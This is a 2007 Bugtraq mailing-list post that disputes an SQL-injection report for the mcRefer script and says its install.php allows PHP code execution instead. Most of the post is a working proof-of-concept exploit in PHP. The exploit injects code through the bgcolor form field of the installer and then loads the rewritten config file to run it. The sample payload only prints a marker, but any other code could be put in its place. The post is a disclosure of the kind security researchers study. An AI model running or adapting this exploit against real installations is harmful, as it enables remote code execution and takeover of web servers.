[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070211112617.20122.qmail@securityfocus.com>
Date: 11 Feb 2007 11:26:17 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: mcRefer SQL injection
This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----
#!/usr/bin/php
<?php
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig@...il.com
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());
Powered by blists - more mailing lists